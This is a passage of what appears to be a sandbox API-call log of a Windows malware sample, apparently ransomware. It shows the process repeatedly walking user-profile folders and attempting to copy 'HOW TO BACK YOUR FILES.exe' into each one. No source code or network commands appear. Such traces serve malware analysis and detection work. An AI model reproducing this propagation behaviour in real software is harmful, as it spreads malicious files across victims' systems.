Data\\Microsoft\\Credentials" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Credentials") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Credentials" [0042.490] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.490] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Credentials\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\microsoft\\credentials\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.490] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.490] GetLastError () returned 0x0 [0042.490] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.490] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.490] CloseHandle (hObject=0x118) returned 1 [0042.491] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f8fb0 | out: hHeap=0x2b0000) returned 1 [0042.491] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.491] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Credentials\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4ac9ede0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ac9ede0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.491] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0042.491] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0042.491] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\History", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\History") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\History" [0042.491] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cb310 | out: hHeap=0x2b0000) returned 1 [0042.491] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2360 | out: hHeap=0x2b0000) returned 1 [0042.491] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\History") returned 78 [0042.491] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\History" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\History") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\History" [0042.491] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.491] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\History\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\history\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.492] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.492] GetLastError () returned 0x0 [0042.492] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.492] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.492] CloseHandle (hObject=0x118) returned 1 [0042.492] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f8fb0 | out: hHeap=0x2b0000) returned 1 [0042.492] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.492] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\History\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4ac9ede0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ac9ede0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.492] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0042.492] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0042.492] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\History\\Low", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\History\\Low") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\History\\Low" [0042.492] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cb310 | out: hHeap=0x2b0000) returned 1 [0042.492] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2380 | out: hHeap=0x2b0000) returned 1 [0042.492] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\History\\Low") returned 82 [0042.492] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\History\\Low" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\History\\Low") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\History\\Low" [0042.492] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.492] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\History\\Low\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\history\\low\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.493] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.493] GetLastError () returned 0x0 [0042.493] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.493] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.493] CloseHandle (hObject=0x118) returned 1 [0042.493] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f8fb0 | out: hHeap=0x2b0000) returned 1 [0042.493] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.493] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\History\\Low\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4acc4f40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4acc4f40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.493] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0042.493] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0042.494] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\History\\History.IE5", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\History\\History.IE5") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\History\\History.IE5" [0042.494] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f2fc8 | out: hHeap=0x2b0000) returned 1 [0042.494] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2360 | out: hHeap=0x2b0000) returned 1 [0042.494] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\History\\History.IE5") returned 90 [0042.494] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\History\\History.IE5" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\History\\History.IE5") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\History\\History.IE5" [0042.494] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.494] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\History\\History.IE5\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\history\\history.ie5\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.494] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.494] GetLastError () returned 0x0 [0042.494] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.494] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.495] CloseHandle (hObject=0x118) returned 1 [0042.495] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.495] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\History\\History.IE5\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4acc4f40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4acc4f40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.495] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0042.495] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0042.495] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data" [0042.495] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data" [0042.495] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.495] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.496] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.496] GetLastError () returned 0x0 [0042.496] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.496] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.496] CloseHandle (hObject=0x118) returned 1 [0042.496] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.496] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x49f874e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x49f874e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.496] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0042.496] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0042.496] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Temporary Internet Files", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Temporary Internet Files") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Temporary Internet Files" [0042.496] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Temporary Internet Files" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Temporary Internet Files") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Temporary Internet Files" [0042.496] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.496] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\temporary internet files\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.497] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.497] GetLastError () returned 0x0 [0042.497] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.497] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.497] CloseHandle (hObject=0x118) returned 1 [0042.497] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.497] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4a3658a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a3658a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.498] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0042.498] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0042.498] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Virtualized", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Virtualized") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Virtualized" [0042.498] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Virtualized" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Virtualized") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Virtualized" [0042.498] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.498] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Virtualized\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\temporary internet files\\virtualized\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.498] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.498] GetLastError () returned 0x0 [0042.498] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.498] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.499] CloseHandle (hObject=0x118) returned 1 [0042.499] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.499] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Virtualized\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a423f80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a423f80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.499] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0042.499] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0042.499] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Low", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Low") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Low" [0042.499] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Low" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Low") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Low" [0042.499] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.499] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Low\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\temporary internet files\\low\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.500] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.500] GetLastError () returned 0x0 [0042.500] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.500] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.500] CloseHandle (hObject=0x118) returned 1 [0042.500] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.500] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Low\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a44a0e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a44a0e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.500] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0042.500] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0042.500] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5" [0042.500] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5" [0042.500] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.500] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\temporary internet files\\content.ie5\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.501] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.501] GetLastError () returned 0x0 [0042.501] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.501] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.501] CloseHandle (hObject=0x118) returned 1 [0042.501] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.501] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a4bc500, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a4bc500, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.501] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0042.501] 